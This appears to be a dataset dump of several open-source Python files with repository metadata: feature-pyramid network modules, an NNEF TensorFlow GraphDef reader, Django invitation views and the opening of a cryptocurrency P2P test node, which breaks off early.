assert len(set(in_channels_list)) == 1, "Input channels of every level must be the same"
assert in_channels_list[0] == f_channels, "Input channels must be the same as `f_channels`"
self.bottomups = nn.ModuleList([
BottomUp(f_channels, lite=lite)
for _ in in_channels_list[1:]
])
self.out_channels = [f_channels] * len(in_channels_list)
def forward(self, *ps):
ns = [ps[0]]
for p, bottomup in zip(ps[1:], self.bottomups):
n = bottomup(p, ns[-1])
ns.append(n)
return tuple(ns)
class ContextEnhance(nn.Module):
def __init__(self, in_channels, out_channels):
super().__init__()
self.lats = nn.ModuleList([
Conv2d(c, out_channels, kernel_size=1, norm='default')
for c in in_channels
])
self.lat_glb = Conv2d(in_channels[-1], out_channels, kernel_size=1,
norm='default')
def forward(self, *cs):
size = cs[0].size()[2:4]
p = self.lats[0](cs[0])
for c, lat in zip(cs[1:], self.lats[1:]):
p += F.interpolate(lat(c), size=size, mode='bilinear', align_corners=False)
c_glb = F.adaptive_avg_pool2d(cs[-1], 1)
p_glb = self.lat_glb(c_glb)
p += p_glb
return p
def stacked_fpn(num_stacked, in_channels_list, extra_layers=(), f_channels=256, lite=False, upsample='interpolate'):
assert num_stacked >= 2, "Use FPN directly if `num_stacked` is smaller than 2."
layers = [FPN(in_channels_list, f_channels, extra_layers, lite=lite, upsample=upsample)]
for i in range(1, num_stacked):
if i % 2 == 0:
layers.append(FPN(layers[-1].out_channels, f_channels, lite=lite, upsample=upsample))
else:
layers.append(FPN2(layers[-1].out_channels, f_channels, lite=lite))
m = Sequential(*layers)
m.out_channels = m[-1].out_channels
return m
def stacked_nas_fpn(num_stacked, in_channels_list, extra_layers=(), f_channels=256, lite=False, upsample='interpolate'):
    """Build an FPN entry stage followed by (num_stacked - 1) NAS-FPN stages.

    The first FPN uses max-pool downsampling for the extra levels; the
    returned Sequential exposes the final stage's `out_channels`.
    """
    assert num_stacked >= 2, "Use FPN directly if `num_stacked` is smaller than 2."
    stages = [FPN(in_channels_list, f_channels, extra_layers, downsample='maxpool', lite=lite, upsample=upsample)]
    stages.extend(NASFPN(f_channels) for _ in range(num_stacked - 1))
    model = Sequential(*stages)
    model.out_channels = model[-1].out_channels
    return model
class IDA(nn.Module):
    """Iterative Deep Aggregation: repeatedly fuses adjacent levels with
    DeconvTopDown blocks until a single feature map remains.

    Parameters
    ----------
    in_channels_list : channel counts of the input levels (finest first).
    f_channels : channel count of every fused output.
    lite : use the lightweight (depthwise-separable) fusion variant.
    """
    def __init__(self, in_channels_list, f_channels, lite=False):
        super().__init__()
        self.num_levels = len(in_channels_list)
        self.topdowns = nn.ModuleList([
            DeconvTopDown(in_channels_list[i], in_channels_list[i + 1], f_channels, lite=lite)
            for i in range(self.num_levels - 1)
        ])
        if self.num_levels > 2:
            # Bug fix: forward `lite` to the recursive stage. It was previously
            # dropped, so deeper stages silently built full convolutions even
            # in lite mode — inconsistent with IDA2, which propagates it.
            self.deep = IDA([f_channels] * (self.num_levels - 1), f_channels, lite=lite)
    def forward(self, *xs):
        # Fuse each adjacent pair, shrinking the pyramid by one level.
        xs = [
            l(xs[i], xs[i + 1]) for i, l in enumerate(self.topdowns)
        ]
        if self.num_levels > 2:
            return self.deep(*xs)
        else:
            return xs[0]
class IDA2(nn.Module):
    """Iterative Deep Aggregation variant where each fusion keeps the channel
    count of the coarser input, recursing until one map remains."""
    def __init__(self, in_channels, lite=False):
        super().__init__()
        self.num_levels = len(in_channels)
        fusions = []
        for lo, hi in zip(in_channels[:-1], in_channels[1:]):
            # Fuse level with channels `lo` into its neighbour with `hi`,
            # producing `hi` channels.
            fusions.append(DeconvTopDown(lo, hi, hi, lite=lite))
        self.topdowns = nn.ModuleList(fusions)
        if self.num_levels > 2:
            self.deep = IDA2(in_channels[1:], lite=lite)
    def forward(self, *xs):
        merged = [fuse(xs[i], xs[i + 1]) for i, fuse in enumerate(self.topdowns)]
        if self.num_levels > 2:
            return self.deep(*merged)
        return merged[0]
class YOLOFPN(nn.Module):
    """YOLOv3-style top-down neck built from MBConv blocks.

    Levels are processed coarsest-first: the deepest feature map goes through
    a conv stack, its intermediate (f_channels // 4) tensor is projected with
    a 1x1 lateral conv, upsampled, concatenated with the next finer backbone
    level, and the pattern repeats. `outs` produce the per-level detection
    features, returned finest-first to match the input order.
    """
    def __init__(self, in_channels_list, f_channels_list=(256, 512, 1024), kernel_size=5):
        super().__init__()
        assert len(in_channels_list) == len(f_channels_list)
        num_levels = len(in_channels_list)
        self.convs = nn.ModuleList([])
        self.lats = nn.ModuleList([])
        self.outs = nn.ModuleList([])
        # i == 0 is the coarsest level; negative indexing walks the channel
        # lists from the back.
        for i in range(num_levels):
            f_channels = f_channels_list[-(i+1)]
            in_channels = in_channels_list[-(i+1)]
            if i == 0:
                # Coarsest level: no lateral input, just the conv stack.
                self.convs.append(nn.Sequential(
                    MBConv(in_channels, in_channels, f_channels // 4, kernel_size=kernel_size),
                    MBConv(f_channels // 4, f_channels, f_channels // 4, kernel_size=kernel_size),
                ))
            else:
                # Lateral 1x1 conv adapting the previous (coarser) level's
                # bottleneck channels before upsample+concat.
                self.lats.append(Conv2d(f_channels_list[-i] // 4, f_channels // 4, kernel_size=1,
                                        norm='default'))
                # Input now carries the backbone channels plus the upsampled
                # lateral channels.
                self.convs.append(nn.Sequential(
                    MBConv(in_channels + f_channels // 4, in_channels + f_channels // 4, f_channels // 4, kernel_size=kernel_size),
                    MBConv(f_channels // 4, f_channels, f_channels // 4, kernel_size=kernel_size),
                ))
            # Per-level output head.
            self.outs.append(MBConv(f_channels // 4, f_channels, None, kernel_size=kernel_size))
        self.out_channels = tuple(f_channels_list)
    def forward(self, *cs):
        ps = []
        # Start from the coarsest backbone level.
        p1 = self.convs[0](cs[-1])
        p2 = self.outs[0](p1)
        ps.append(p2)
        # Walk towards finer levels, carrying p1 (the bottleneck tensor) down.
        for lat, conv, out, c in zip(self.lats, self.convs[1:], self.outs[1:], reversed(cs[:-1])):
            c = upsample_concat(lat(p1), c)
            p1 = conv(c)
            p2 = out(p1)
            ps.append(p2)
        # ps was built coarsest-first; return finest-first.
        return tuple(reversed(ps))
| true | true |
f7326c61039f4f44e5db64824c415f984f9b2d6c | 8,034 | py | Python | nnef_tools/io/tf/graphdef/reader.py | dvorotnev/NNEF-Tools | 0219a509c34bb5b291bee497cbd658d6a5922171 | [
"Apache-2.0"
] | null | null | null | nnef_tools/io/tf/graphdef/reader.py | dvorotnev/NNEF-Tools | 0219a509c34bb5b291bee497cbd658d6a5922171 | [
"Apache-2.0"
] | null | null | null | nnef_tools/io/tf/graphdef/reader.py | dvorotnev/NNEF-Tools | 0219a509c34bb5b291bee497cbd658d6a5922171 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2020 The Khronos Group Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import division, print_function, absolute_import
from collections import namedtuple
from ....model import *
from ....utils.types import as_str
from .protobuf import *
import numpy as np
import six
Function = namedtuple('Function', ['name', 'attrs'])
_DtypeToNumpy = {
'DT_INVALID': None,
'DT_RESOURCE': np.dtype([('resource', np.int32)]),
'DT_HALF': np.float16,
'DT_FLOAT': np.float32,
'DT_DOUBLE': np.float64,
'DT_INT8': np.int8,
'DT_INT16': np.int16,
'DT_INT32': np.int32,
'DT_INT64': np.int64,
'DT_UINT8': np.uint8,
'DT_UINT16': np.uint16,
'DT_UINT32': np.uint32,
'DT_UINT64': np.uint64,
'DT_BOOL': np.bool,
'DT_STRING': np.str,
'DT_COMPLEX64': np.complex64,
'DT_COMPLEX128': np.complex128,
}
def _get_shape(shape_proto):
return tuple(int(dim.size) if dim.size >= 0 else None for dim in shape_proto.dim) \
if not shape_proto.unknown_rank else None
def _get_dtype(dtype_enum):
    """Map a TensorFlow DataType enum value to a numpy dtype.

    Asserts for entries that map to None in the table (i.e. DT_INVALID),
    since a non-numeric dtype cannot appear in an attribute.
    """
    dtype = _DtypeToNumpy[DataType.Name(dtype_enum)]
    assert dtype is not None, "non-numeric dtype '{}' in attribute".format(DataType.Name(dtype_enum))
    return dtype
def _get_nonempty_items(message, fields):
for field in fields:
items = getattr(message, field)
if len(items):
return field, items
return None, None
def _get_tensor(tensor_proto):
    """Decode a TensorProto into a numpy array.

    Prefers the packed `tensor_content` byte buffer; otherwise falls back to
    the per-dtype repeated value fields, broadcasting a single stored scalar
    to the full shape (protobuf stores constant-filled tensors that way).
    """
    shape = _get_shape(tensor_proto.tensor_shape)
    dtype = _get_dtype(tensor_proto.dtype)
    if len(tensor_proto.tensor_content):
        # Fast path: raw buffer holding the whole tensor.
        data = np.frombuffer(tensor_proto.tensor_content, dtype=dtype).reshape(shape)
    else:
        # Slow path: values live in one of the typed repeated fields.
        field, items = _get_nonempty_items(tensor_proto,
                                           fields=['half_val', 'float_val', 'double_val', 'int_val', 'int64_val',
                                                   'bool_val', 'string_val', 'uint32_val', 'uint64_val',
                                                   'resource_handle_val', 'scomplex_val', 'dcomplex_val'])
        assert items is not None, "tensor items are empty, dtype = {}".format(dtype)
        items = [item for item in items]
        if len(items) == int(np.prod(shape)):
            data = np.array(items, dtype=dtype).reshape(shape)
        else:
            # A single value stands for a tensor filled with that value.
            assert len(items) == 1
            data = np.full(shape=shape, dtype=dtype, fill_value=items[0])
    return data
def _get_func(name_attrlist_proto):
return Function(name_attrlist_proto.name, _get_attributes(name_attrlist_proto.attr))
def _get_attribute(field, value):
if field == 'i' or field == 'f' or field == 'b' or field == 'placeholder':
return value
elif field == 's':
return as_str(value.decode())
elif field == 'shape':
return _get_shape(value)
elif field == 'type':
return _get_dtype(value)
elif field == 'tensor':
return _get_tensor(value)
elif field == 'func':
return _get_func(value)
elif field == 'list':
field, items = _get_nonempty_items(value, fields=['i', 'f', 'b', 's', 'shape', 'type', 'tensor', 'func'])
return [_get_attribute(field, item) for item in items] if items is not None else []
assert False
def _get_attributes(attr_map_proto):
attributes = {}
for name, value in attr_map_proto.items():
field = value.WhichOneof('value')
if field is not None:
value = getattr(value, field)
attributes[as_str(name)] = _get_attribute(field, value)
else:
attributes[as_str(name)] = None
return attributes
def _get_output_name(node_name, idx):
return node_name + ':' + str(idx) if idx > 0 else node_name
def _has_output_shapes(graph_def):
return all('_output_shapes' in node.attr and node.attr['_output_shapes'].WhichOneof('value') is not None
for node in graph_def.node)
def _add_output_shapes(graph_def):
try:
import tensorflow.compat.v1 as tf
except ImportError:
import tensorflow as tf
tf.import_graph_def(graph_def, name='')
return tf.get_default_graph().as_graph_def(add_shapes=True)
def _get_dtypes(graph_def):
try:
import tensorflow.compat.v1 as tf
except ImportError:
import tensorflow as tf
dtypes = {}
graph = tf.Graph()
with graph.as_default():
tf.import_graph_def(graph_def, name='')
for op in graph.get_operations():
for tensor in op.outputs:
name = tensor.name[:-2] if tensor.name.endswith(':0') else tensor.name
dtypes[name] = tensor.dtype.as_numpy_dtype if tensor.dtype != tf.resource else _DtypeToNumpy['DT_RESOURCE'].type
return dtypes
def _get_output_shapes(attr_map_proto):
value = attr_map_proto['_output_shapes']
field = value.WhichOneof('value')
if field is None:
return None
value = getattr(value, field)
return _get_attribute(field, value)
def build_graph(graph_def):
graph = Graph()
dtypes = _get_dtypes(graph_def)
# create tensors
node_outputs = {}
for node in graph_def.node:
output_shapes = _get_output_shapes(node.attr)
if output_shapes is not None:
name = as_str(node.name)
node_outputs[name] = [Tensor(graph, _get_output_name(name, idx), shape=shape, dtype=dtypes.get(name))
for idx, shape in enumerate(output_shapes)]
tensors = {tensor.name: tensor for outputs in six.itervalues(node_outputs) for tensor in outputs}
# create ops
for node in graph_def.node:
attributes = _get_attributes(node.attr)
inputs = [tensors[name] for name in node.input if not name.startswith('^')]
outputs = node_outputs[node.name] if node.name in node_outputs else []
Operation(graph,
type=as_str(node.op),
name=as_str(node.name),
inputs=inputs,
outputs=outputs,
attribs=attributes)
graph.inputs = [node_outputs[node.name][0] for node in graph_def.node if node.op == 'Placeholder']
graph.outputs = [output for op in graph.operations if all(len(output.consumers) == 0 for output in op.outputs)
for output in op.outputs]
return graph
def _unpack_custom_ops(graph):
for op in graph.operations:
if op.type == 'PyFunc':
op.custom = True
op.type = op.attribs['token']
op.attribs = {key[2:-2]: value for key, value in six.iteritems(op.attribs)
if key.startswith('_$') and key.endswith('$_')}
def read_graphdef(filename, input_shapes, fold_constants):
graph_def = GraphDef()
with open(filename, 'rb') as file:
graph_def.ParseFromString(file.read())
if not _has_output_shapes(graph_def):
graph_def = _add_output_shapes(graph_def)
if input_shapes is not None:
from .utils import set_input_shapes
graph_def = set_input_shapes(graph_def, input_shapes)
if fold_constants:
from .utils import fold_constant_tensors
graph_def = fold_constant_tensors(graph_def)
graph = build_graph(graph_def)
_unpack_custom_ops(graph)
return graph
class Reader(object):
def __init__(self, fold_constants=False):
self._fold_constants = fold_constants
def __call__(self, filename, input_shapes=None):
return read_graphdef(filename, input_shapes, self._fold_constants)
| 32.136 | 128 | 0.647747 |
from __future__ import division, print_function, absolute_import
from collections import namedtuple
from ....model import *
from ....utils.types import as_str
from .protobuf import *
import numpy as np
import six
Function = namedtuple('Function', ['name', 'attrs'])
_DtypeToNumpy = {
'DT_INVALID': None,
'DT_RESOURCE': np.dtype([('resource', np.int32)]),
'DT_HALF': np.float16,
'DT_FLOAT': np.float32,
'DT_DOUBLE': np.float64,
'DT_INT8': np.int8,
'DT_INT16': np.int16,
'DT_INT32': np.int32,
'DT_INT64': np.int64,
'DT_UINT8': np.uint8,
'DT_UINT16': np.uint16,
'DT_UINT32': np.uint32,
'DT_UINT64': np.uint64,
'DT_BOOL': np.bool,
'DT_STRING': np.str,
'DT_COMPLEX64': np.complex64,
'DT_COMPLEX128': np.complex128,
}
def _get_shape(shape_proto):
return tuple(int(dim.size) if dim.size >= 0 else None for dim in shape_proto.dim) \
if not shape_proto.unknown_rank else None
def _get_dtype(dtype_enum):
dtype = _DtypeToNumpy[DataType.Name(dtype_enum)]
assert dtype is not None, "non-numeric dtype '{}' in attribute".format(DataType.Name(dtype_enum))
return dtype
def _get_nonempty_items(message, fields):
for field in fields:
items = getattr(message, field)
if len(items):
return field, items
return None, None
def _get_tensor(tensor_proto):
shape = _get_shape(tensor_proto.tensor_shape)
dtype = _get_dtype(tensor_proto.dtype)
if len(tensor_proto.tensor_content):
data = np.frombuffer(tensor_proto.tensor_content, dtype=dtype).reshape(shape)
else:
field, items = _get_nonempty_items(tensor_proto,
fields=['half_val', 'float_val', 'double_val', 'int_val', 'int64_val',
'bool_val', 'string_val', 'uint32_val', 'uint64_val',
'resource_handle_val', 'scomplex_val', 'dcomplex_val'])
assert items is not None, "tensor items are empty, dtype = {}".format(dtype)
items = [item for item in items]
if len(items) == int(np.prod(shape)):
data = np.array(items, dtype=dtype).reshape(shape)
else:
assert len(items) == 1
data = np.full(shape=shape, dtype=dtype, fill_value=items[0])
return data
def _get_func(name_attrlist_proto):
return Function(name_attrlist_proto.name, _get_attributes(name_attrlist_proto.attr))
def _get_attribute(field, value):
if field == 'i' or field == 'f' or field == 'b' or field == 'placeholder':
return value
elif field == 's':
return as_str(value.decode())
elif field == 'shape':
return _get_shape(value)
elif field == 'type':
return _get_dtype(value)
elif field == 'tensor':
return _get_tensor(value)
elif field == 'func':
return _get_func(value)
elif field == 'list':
field, items = _get_nonempty_items(value, fields=['i', 'f', 'b', 's', 'shape', 'type', 'tensor', 'func'])
return [_get_attribute(field, item) for item in items] if items is not None else []
assert False
def _get_attributes(attr_map_proto):
attributes = {}
for name, value in attr_map_proto.items():
field = value.WhichOneof('value')
if field is not None:
value = getattr(value, field)
attributes[as_str(name)] = _get_attribute(field, value)
else:
attributes[as_str(name)] = None
return attributes
def _get_output_name(node_name, idx):
return node_name + ':' + str(idx) if idx > 0 else node_name
def _has_output_shapes(graph_def):
return all('_output_shapes' in node.attr and node.attr['_output_shapes'].WhichOneof('value') is not None
for node in graph_def.node)
def _add_output_shapes(graph_def):
try:
import tensorflow.compat.v1 as tf
except ImportError:
import tensorflow as tf
tf.import_graph_def(graph_def, name='')
return tf.get_default_graph().as_graph_def(add_shapes=True)
def _get_dtypes(graph_def):
try:
import tensorflow.compat.v1 as tf
except ImportError:
import tensorflow as tf
dtypes = {}
graph = tf.Graph()
with graph.as_default():
tf.import_graph_def(graph_def, name='')
for op in graph.get_operations():
for tensor in op.outputs:
name = tensor.name[:-2] if tensor.name.endswith(':0') else tensor.name
dtypes[name] = tensor.dtype.as_numpy_dtype if tensor.dtype != tf.resource else _DtypeToNumpy['DT_RESOURCE'].type
return dtypes
def _get_output_shapes(attr_map_proto):
value = attr_map_proto['_output_shapes']
field = value.WhichOneof('value')
if field is None:
return None
value = getattr(value, field)
return _get_attribute(field, value)
def build_graph(graph_def):
graph = Graph()
dtypes = _get_dtypes(graph_def)
node_outputs = {}
for node in graph_def.node:
output_shapes = _get_output_shapes(node.attr)
if output_shapes is not None:
name = as_str(node.name)
node_outputs[name] = [Tensor(graph, _get_output_name(name, idx), shape=shape, dtype=dtypes.get(name))
for idx, shape in enumerate(output_shapes)]
tensors = {tensor.name: tensor for outputs in six.itervalues(node_outputs) for tensor in outputs}
for node in graph_def.node:
attributes = _get_attributes(node.attr)
inputs = [tensors[name] for name in node.input if not name.startswith('^')]
outputs = node_outputs[node.name] if node.name in node_outputs else []
Operation(graph,
type=as_str(node.op),
name=as_str(node.name),
inputs=inputs,
outputs=outputs,
attribs=attributes)
graph.inputs = [node_outputs[node.name][0] for node in graph_def.node if node.op == 'Placeholder']
graph.outputs = [output for op in graph.operations if all(len(output.consumers) == 0 for output in op.outputs)
for output in op.outputs]
return graph
def _unpack_custom_ops(graph):
for op in graph.operations:
if op.type == 'PyFunc':
op.custom = True
op.type = op.attribs['token']
op.attribs = {key[2:-2]: value for key, value in six.iteritems(op.attribs)
if key.startswith('_$') and key.endswith('$_')}
def read_graphdef(filename, input_shapes, fold_constants):
graph_def = GraphDef()
with open(filename, 'rb') as file:
graph_def.ParseFromString(file.read())
if not _has_output_shapes(graph_def):
graph_def = _add_output_shapes(graph_def)
if input_shapes is not None:
from .utils import set_input_shapes
graph_def = set_input_shapes(graph_def, input_shapes)
if fold_constants:
from .utils import fold_constant_tensors
graph_def = fold_constant_tensors(graph_def)
graph = build_graph(graph_def)
_unpack_custom_ops(graph)
return graph
class Reader(object):
def __init__(self, fold_constants=False):
self._fold_constants = fold_constants
def __call__(self, filename, input_shapes=None):
return read_graphdef(filename, input_shapes, self._fold_constants)
| true | true |
f7326cbc92b19dd088c0d4b5e17acb19500de1d9 | 4,740 | py | Python | pinax/invitations/views.py | passiv/pinax-invitations | c3194cd1b3cc92a1d706b1f3b018d58948ed5cb2 | [
"MIT"
] | 43 | 2015-09-25T19:46:04.000Z | 2022-01-25T22:38:39.000Z | pinax/invitations/views.py | passiv/pinax-invitations | c3194cd1b3cc92a1d706b1f3b018d58948ed5cb2 | [
"MIT"
] | 21 | 2015-09-10T15:40:26.000Z | 2021-08-31T15:17:25.000Z | pinax/invitations/views.py | passiv/pinax-invitations | c3194cd1b3cc92a1d706b1f3b018d58948ed5cb2 | [
"MIT"
] | 16 | 2015-09-09T02:32:35.000Z | 2022-03-17T02:51:26.000Z | from django.contrib.auth import get_user_model
from django.contrib.auth.decorators import permission_required
from django.http import JsonResponse
from django.shortcuts import get_object_or_404
from django.template import RequestContext
from django.template.loader import render_to_string
from django.utils.decorators import method_decorator
from django.views.generic import View
from django.views.generic.edit import FormMixin
from account.mixins import LoginRequiredMixin
from .forms import InviteForm
from .models import InvitationStat, JoinInvitation
class InviteView(LoginRequiredMixin, FormMixin, View):
form_class = InviteForm
invite_form_fragment = "pinax/invitations/_invite_form.html"
invites_remaining_fragment = "pinax/invitations/_invites_remaining.html"
invited_fragment = "pinax/invitations/_invited.html"
invites_remaining_fragment_selector = ".pinax-invitations-invites-remaining"
invited_fragment_selector = ".pinax-invitations-invites-sent"
def get_data(self, form):
data = {
"html": render_to_string(
self.invite_form_fragment, {
"form": form,
"user": self.request.user
}, request=self.request
),
"fragments": {
self.invites_remaining_fragment_selector: render_to_string(
self.invites_remaining_fragment, {
"invites_remaining": self.request.user.invitationstat.invites_remaining()
}, request=self.request
),
self.invited_fragment_selector: render_to_string(
self.invited_fragment, {
"invited_list": self.request.user.invites_sent.all()
}, request=self.request
)
}
}
return data
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs.update({
"user": self.request.user
})
return kwargs
def form_valid(self, form):
email = form.cleaned_data["email_address"]
JoinInvitation.invite(self.request.user, email)
return JsonResponse(self.get_data(InviteForm(user=self.request.user)))
def form_invalid(self, form):
return JsonResponse(self.get_data(form))
def post(self, request, *args, **kwargs):
form = self.get_form()
if form.is_valid():
return self.form_valid(form)
else:
return self.form_invalid(form)
class ManageInvitesView(LoginRequiredMixin, View):
    """Base view for invite-administration endpoints.

    Requires an authenticated user plus the `manage_invites` permission;
    `raise_exception=True` returns 403 instead of redirecting to login.
    """
    @method_decorator(permission_required("pinax-invitations.manage_invites", raise_exception=True))
    def dispatch(self, *args, **kwargs):
        # Wrapping dispatch() gates every HTTP method at once.
        return super().dispatch(*args, **kwargs)
class InviteStatView(ManageInvitesView):
    """Render the invitation-stat fragment for a single user and return it
    as JSON: ``{"html": ...}``.

    NOTE(review): ``self.invite_stat_fragment`` is not defined on this class
    or any base visible in this file; a subclass/URL conf must supply the
    template path or this view raises AttributeError — confirm.
    """
    def get(self, request, *args, **kwargs):
        user = get_object_or_404(get_user_model(), pk=kwargs.get("pk"))
        return JsonResponse({
            "html": render_to_string(
                self.invite_stat_fragment, {
                    "stat": user.invitationstat
                },
                # Bug fix: `context_instance` was removed from
                # render_to_string in Django 1.10; pass the request directly,
                # matching every other render_to_string call in this module.
                request=request
            )
        })
class ManageInviteAmountsView(ManageInvitesView):
amount_post_var = "amount"
def get_amount(self):
return int(self.request.POST.get(self.amount_post_var))
class AllManageInviteAmountsView(ManageInviteAmountsView):
def action(self, amount):
return
def post(self, request, *args, **kwargs):
amount = self.get_amount()
self.action(amount)
return JsonResponse({
"inner-fragments": {self.inner_fragments_amount_selector: amount}
})
class UserManageInviteAmountsView(ManageInviteAmountsView):
def action(self, user, amount):
return
def post(self, request, *args, **kwargs):
user = get_object_or_404(get_user_model(), pk=kwargs.get("pk"))
amount = self.get_amount()
self.action(user, amount)
return JsonResponse({
"html": amount
})
class TopOffAllView(AllManageInviteAmountsView):
inner_fragments_amount_selector = ".invite-total"
def action(self, amount):
InvitationStat.topoff(amount)
class TopOffUserView(UserManageInviteAmountsView):
def action(self, user, amount):
InvitationStat.topoff_user(user=user, amount=amount)
class AddToAllView(AllManageInviteAmountsView):
inner_fragments_amount_selector = ".amount-added"
def action(self, amount):
InvitationStat.add_invites(amount)
class AddToUserView(UserManageInviteAmountsView):
def action(self, user, amount):
InvitationStat.add_invites_to_user(user=user, amount=amount)
| 31.184211 | 100 | 0.665401 | from django.contrib.auth import get_user_model
from django.contrib.auth.decorators import permission_required
from django.http import JsonResponse
from django.shortcuts import get_object_or_404
from django.template import RequestContext
from django.template.loader import render_to_string
from django.utils.decorators import method_decorator
from django.views.generic import View
from django.views.generic.edit import FormMixin
from account.mixins import LoginRequiredMixin
from .forms import InviteForm
from .models import InvitationStat, JoinInvitation
class InviteView(LoginRequiredMixin, FormMixin, View):
form_class = InviteForm
invite_form_fragment = "pinax/invitations/_invite_form.html"
invites_remaining_fragment = "pinax/invitations/_invites_remaining.html"
invited_fragment = "pinax/invitations/_invited.html"
invites_remaining_fragment_selector = ".pinax-invitations-invites-remaining"
invited_fragment_selector = ".pinax-invitations-invites-sent"
def get_data(self, form):
data = {
"html": render_to_string(
self.invite_form_fragment, {
"form": form,
"user": self.request.user
}, request=self.request
),
"fragments": {
self.invites_remaining_fragment_selector: render_to_string(
self.invites_remaining_fragment, {
"invites_remaining": self.request.user.invitationstat.invites_remaining()
}, request=self.request
),
self.invited_fragment_selector: render_to_string(
self.invited_fragment, {
"invited_list": self.request.user.invites_sent.all()
}, request=self.request
)
}
}
return data
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs.update({
"user": self.request.user
})
return kwargs
def form_valid(self, form):
email = form.cleaned_data["email_address"]
JoinInvitation.invite(self.request.user, email)
return JsonResponse(self.get_data(InviteForm(user=self.request.user)))
def form_invalid(self, form):
return JsonResponse(self.get_data(form))
def post(self, request, *args, **kwargs):
form = self.get_form()
if form.is_valid():
return self.form_valid(form)
else:
return self.form_invalid(form)
class ManageInvitesView(LoginRequiredMixin, View):
@method_decorator(permission_required("pinax-invitations.manage_invites", raise_exception=True))
def dispatch(self, *args, **kwargs):
return super().dispatch(*args, **kwargs)
class InviteStatView(ManageInvitesView):
def get(self, request, *args, **kwargs):
user = get_object_or_404(get_user_model(), pk=kwargs.get("pk"))
return JsonResponse({
"html": render_to_string(
self.invite_stat_fragment, {
"stat": user.invitationstat
}, context_instance=RequestContext(request)
)
})
class ManageInviteAmountsView(ManageInvitesView):
amount_post_var = "amount"
def get_amount(self):
return int(self.request.POST.get(self.amount_post_var))
class AllManageInviteAmountsView(ManageInviteAmountsView):
def action(self, amount):
return
def post(self, request, *args, **kwargs):
amount = self.get_amount()
self.action(amount)
return JsonResponse({
"inner-fragments": {self.inner_fragments_amount_selector: amount}
})
class UserManageInviteAmountsView(ManageInviteAmountsView):
def action(self, user, amount):
return
def post(self, request, *args, **kwargs):
user = get_object_or_404(get_user_model(), pk=kwargs.get("pk"))
amount = self.get_amount()
self.action(user, amount)
return JsonResponse({
"html": amount
})
class TopOffAllView(AllManageInviteAmountsView):
inner_fragments_amount_selector = ".invite-total"
def action(self, amount):
InvitationStat.topoff(amount)
class TopOffUserView(UserManageInviteAmountsView):
def action(self, user, amount):
InvitationStat.topoff_user(user=user, amount=amount)
class AddToAllView(AllManageInviteAmountsView):
inner_fragments_amount_selector = ".amount-added"
def action(self, amount):
InvitationStat.add_invites(amount)
class AddToUserView(UserManageInviteAmountsView):
def action(self, user, amount):
InvitationStat.add_invites_to_user(user=user, amount=amount)
| true | true |
f7326d7f452791ff8fb5bc06a352c3c3fbb10c38 | 23,224 | py | Python | test/functional/test_framework/mininode.py | minblock/lockely | 6bc00e80efdf563b52555bc2f547f271f399b03a | [
"MIT"
] | null | null | null | test/functional/test_framework/mininode.py | minblock/lockely | 6bc00e80efdf563b52555bc2f547f271f399b03a | [
"MIT"
] | null | null | null | test/functional/test_framework/mininode.py | minblock/lockely | 6bc00e80efdf563b52555bc2f547f271f399b03a | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2010 ArtForz -- public domain half-a-node
# Copyright (c) 2012 Jeff Garzik
# Copyright (c) 2010-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Lockelycoin P2P network half-a-node.
This python code was modified from ArtForz' public domain half-a-node, as
found in the mini-node branch of http://github.com/jgarzik/pynode.
P2PConnection: A low-level connection object to a node's P2P interface
P2PInterface: A high-level interface object for communicating to a node over P2P
P2PDataStore: A p2p interface class that keeps a store of transactions and blocks
and can respond correctly to getdata and getheaders messages"""
import asyncio
from collections import defaultdict
from io import BytesIO
import logging
import struct
import sys
import threading
from test_framework.messages import (
CBlockHeader,
MIN_VERSION_SUPPORTED,
msg_addr,
msg_block,
MSG_BLOCK,
msg_blocktxn,
msg_cmpctblock,
msg_feefilter,
msg_getaddr,
msg_getblocks,
msg_getblocktxn,
msg_getdata,
msg_getheaders,
msg_headers,
msg_inv,
msg_mempool,
msg_notfound,
msg_ping,
msg_pong,
msg_reject,
msg_sendcmpct,
msg_sendheaders,
msg_tx,
MSG_TX,
MSG_TYPE_MASK,
msg_verack,
msg_version,
NODE_NETWORK,
NODE_WITNESS,
sha256,
)
from test_framework.util import wait_until
logger = logging.getLogger("TestFramework.mininode")
MESSAGEMAP = {
b"addr": msg_addr,
b"block": msg_block,
b"blocktxn": msg_blocktxn,
b"cmpctblock": msg_cmpctblock,
b"feefilter": msg_feefilter,
b"getaddr": msg_getaddr,
b"getblocks": msg_getblocks,
b"getblocktxn": msg_getblocktxn,
b"getdata": msg_getdata,
b"getheaders": msg_getheaders,
b"headers": msg_headers,
b"inv": msg_inv,
b"mempool": msg_mempool,
b"notfound": msg_notfound,
b"ping": msg_ping,
b"pong": msg_pong,
b"reject": msg_reject,
b"sendcmpct": msg_sendcmpct,
b"sendheaders": msg_sendheaders,
b"tx": msg_tx,
b"verack": msg_verack,
b"version": msg_version,
}
MAGIC_BYTES = {
"mainnet": b"\xfb\xc0\xb6\xdb", # mainnet
"testnet4": b"\xfd\xd2\xc8\xf1", # testnet3
"regtest": b"\xfa\xbf\xb5\xda", # regtest
}
class P2PConnection(asyncio.Protocol):
    """A low-level connection object to a node's P2P interface.

    This class is responsible for:

    - opening and closing the TCP connection to the node
    - reading bytes from and writing bytes to the socket
    - deserializing and serializing the P2P message header
    - logging messages as they are sent and received

    This class contains no logic for handing the P2P message payloads. It must be
    sub-classed and the on_message() callback overridden."""

    def __init__(self):
        # The underlying transport of the connection.
        # Should only call methods on this from the NetworkThread, c.f. call_soon_threadsafe
        self._transport = None

    @property
    def is_connected(self):
        return self._transport is not None

    def peer_connect(self, dstaddr, dstport, net="regtest"):
        assert not self.is_connected
        self.dstaddr = dstaddr
        self.dstport = dstport
        # The initial message to send after the connection was made:
        self.on_connection_send_msg = None
        self.recvbuf = b""
